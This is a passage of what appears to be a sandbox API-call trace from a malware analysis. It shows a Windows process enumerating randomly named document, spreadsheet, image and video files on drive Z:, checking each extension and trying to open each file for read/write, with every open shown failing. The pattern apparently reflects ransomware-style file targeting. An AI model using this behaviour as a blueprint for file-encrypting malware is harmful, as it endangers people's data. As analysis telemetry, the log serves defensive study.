cFileName="WVJ9AocI35l55mCp.jpg", cAlternateFileName="")) returned 1 [0181.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.753] PathFindExtensionW (pszPath="Z:\\WVJ9AocI35l55mCp.jpg") returned=".jpg" [0181.757] CreateFileW (lpFileName="Z:\\WVJ9AocI35l55mCp.jpg" (normalized: "z:\\wvj9aoci35l55mcp.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.758] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf281, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kmB0a6WlogU.gif", cAlternateFileName="")) returned 1 [0181.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.758] PathFindExtensionW (pszPath="Z:\\kmB0a6WlogU.gif") returned=".gif" [0181.762] CreateFileW (lpFileName="Z:\\kmB0a6WlogU.gif" (normalized: "z:\\kmb0a6wlogu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.769] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb48c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G7UtZQV2KEwEgGRw.csv", cAlternateFileName="")) returned 1 [0181.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.769] PathFindExtensionW (pszPath="Z:\\G7UtZQV2KEwEgGRw.csv") returned=".csv" [0181.773] CreateFileW (lpFileName="Z:\\G7UtZQV2KEwEgGRw.csv" (normalized: "z:\\g7utzqv2keweggrw.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.774] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x164b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pLGCqUlBqdCyIjLjqV.doc", cAlternateFileName="")) returned 1 [0181.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.775] PathFindExtensionW (pszPath="Z:\\pLGCqUlBqdCyIjLjqV.doc") returned=".doc" [0181.779] CreateFileW (lpFileName="Z:\\pLGCqUlBqdCyIjLjqV.doc" (normalized: "z:\\plgcqulbqdcyijljqv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.780] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc484, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oq2biITomiSUVed.odt", cAlternateFileName="")) returned 1 [0181.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.780] PathFindExtensionW (pszPath="Z:\\Oq2biITomiSUVed.odt") returned=".odt" [0181.784] CreateFileW (lpFileName="Z:\\Oq2biITomiSUVed.odt" (normalized: "z:\\oq2biitomisuved.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.785] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2653c835, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf183, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="03oNIO07eJKfFtSq1le.pdf", cAlternateFileName="")) returned 1 [0181.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.785] PathFindExtensionW (pszPath="Z:\\03oNIO07eJKfFtSq1le.pdf") returned=".pdf" [0181.790] CreateFileW (lpFileName="Z:\\03oNIO07eJKfFtSq1le.pdf" (normalized: "z:\\03onio07ejkfftsq1le.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.791] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfa4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s6dEvdGK0.pptx", cAlternateFileName="")) returned 1 [0181.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.792] PathFindExtensionW (pszPath="Z:\\s6dEvdGK0.pptx") returned=".pptx" [0181.795] CreateFileW (lpFileName="Z:\\s6dEvdGK0.pptx" (normalized: "z:\\s6devdgk0.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.797] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x79d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SqAk5x9DCd1vbqL.xls", cAlternateFileName="")) returned 1 [0181.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.797] PathFindExtensionW (pszPath="Z:\\SqAk5x9DCd1vbqL.xls") returned=".xls" [0181.800] CreateFileW (lpFileName="Z:\\SqAk5x9DCd1vbqL.xls" (normalized: "z:\\sqak5x9dcd1vbql.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.801] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xff02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="les739ApbVb9h5NbQG.png", cAlternateFileName="")) returned 1 [0181.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.801] PathFindExtensionW (pszPath="Z:\\les739ApbVb9h5NbQG.png") returned=".png" [0181.805] CreateFileW (lpFileName="Z:\\les739ApbVb9h5NbQG.png" (normalized: "z:\\les739apbvb9h5nbqg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.806] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0c5f9ps.odt", cAlternateFileName="")) returned 1 [0181.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.806] PathFindExtensionW (pszPath="Z:\\0c5f9ps.odt") returned=".odt" [0181.810] CreateFileW (lpFileName="Z:\\0c5f9ps.odt" (normalized: "z:\\0c5f9ps.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.810] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CUAALsfvQ.odp", cAlternateFileName="")) returned 1 [0181.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.810] PathFindExtensionW (pszPath="Z:\\CUAALsfvQ.odp") returned=".odp" [0181.814] CreateFileW (lpFileName="Z:\\CUAALsfvQ.odp" (normalized: "z:\\cuaalsfvq.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.815] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x107bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IyGa2UNby.ots", cAlternateFileName="")) returned 1 [0181.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.815] PathFindExtensionW (pszPath="Z:\\IyGa2UNby.ots") returned=".ots" [0181.819] CreateFileW (lpFileName="Z:\\IyGa2UNby.ots" (normalized: "z:\\iyga2unby.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.823] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xce96, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NrdJUxDyhDG3y7Oab1mj.flv", cAlternateFileName="")) returned 1 [0181.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.823] PathFindExtensionW (pszPath="Z:\\NrdJUxDyhDG3y7Oab1mj.flv") returned=".flv" [0181.827] CreateFileW (lpFileName="Z:\\NrdJUxDyhDG3y7Oab1mj.flv" (normalized: "z:\\nrdjuxdyhdg3y7oab1mj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.828] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc9f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HwIsy.png", cAlternateFileName="")) returned 1 [0181.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.828] PathFindExtensionW (pszPath="Z:\\HwIsy.png") returned=".png" [0181.832] CreateFileW (lpFileName="Z:\\HwIsy.png" (normalized: "z:\\hwisy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.833] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14b01, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LYsglM.bmp", cAlternateFileName="")) returned 1 [0181.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.833] PathFindExtensionW (pszPath="Z:\\LYsglM.bmp") returned=".bmp" [0181.837] CreateFileW (lpFileName="Z:\\LYsglM.bmp" (normalized: "z:\\lysglm.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.838] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26594678, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbb11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mro5NomIUcrU.gif", cAlternateFileName="")) returned 1 [0181.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.838] PathFindExtensionW (pszPath="Z:\\Mro5NomIUcrU.gif") returned=".gif" [0181.843] CreateFileW (lpFileName="Z:\\Mro5NomIUcrU.gif" (normalized: "z:\\mro5nomiucru.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.844] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17ae3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6IeyZTL6ti1EIr3r.csv", cAlternateFileName="")) returned 1 [0181.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.844] PathFindExtensionW (pszPath="Z:\\6IeyZTL6ti1EIr3r.csv") returned=".csv" [0181.847] CreateFileW (lpFileName="Z:\\6IeyZTL6ti1EIr3r.csv" (normalized: "z:\\6ieyztl6ti1eir3r.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.849] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe624, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XP77ZtgAwnoAMmLb.odt", cAlternateFileName="")) returned 1 [0181.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.849] PathFindExtensionW (pszPath="Z:\\XP77ZtgAwnoAMmLb.odt") returned=".odt" [0181.853] CreateFileW (lpFileName="Z:\\XP77ZtgAwnoAMmLb.odt" (normalized: "z:\\xp77ztgawnoammlb.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.854] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9b63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z5eu5ng8aXBTiqaLM.odt", cAlternateFileName="")) returned 1 [0181.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.854] PathFindExtensionW (pszPath="Z:\\Z5eu5ng8aXBTiqaLM.odt") returned=".odt" [0181.860] CreateFileW (lpFileName="Z:\\Z5eu5ng8aXBTiqaLM.odt" (normalized: "z:\\z5eu5ng8axbtiqalm.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.862] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1463b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cYAzuw.flv", cAlternateFileName="")) returned 1 [0181.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.862] PathFindExtensionW (pszPath="Z:\\cYAzuw.flv") returned=".flv" [0181.867] CreateFileW (lpFileName="Z:\\cYAzuw.flv" (normalized: "z:\\cyazuw.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.869] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17088, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ouLbzd5zuNL.xlsx", cAlternateFileName="")) returned 1 [0181.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.869] PathFindExtensionW (pszPath="Z:\\ouLbzd5zuNL.xlsx") returned=".xlsx" [0181.874] CreateFileW (lpFileName="Z:\\ouLbzd5zuNL.xlsx" (normalized: "z:\\oulbzd5zunl.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.876] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x95ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ziRSYvhMQo.gif", cAlternateFileName="")) returned 1 [0181.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.876] PathFindExtensionW (pszPath="Z:\\ziRSYvhMQo.gif") returned=".gif" [0181.881] CreateFileW (lpFileName="Z:\\ziRSYvhMQo.gif" (normalized: "z:\\zirsyvhmqo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.882] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1287d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ziDfPcXQbWyMR.mkv", cAlternateFileName="")) returned 1 [0181.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.883] PathFindExtensionW (pszPath="Z:\\ziDfPcXQbWyMR.mkv") returned=".mkv" [0181.888] CreateFileW (lpFileName="Z:\\ziDfPcXQbWyMR.mkv" (normalized: "z:\\zidfpcxqbwymr.mkv"), 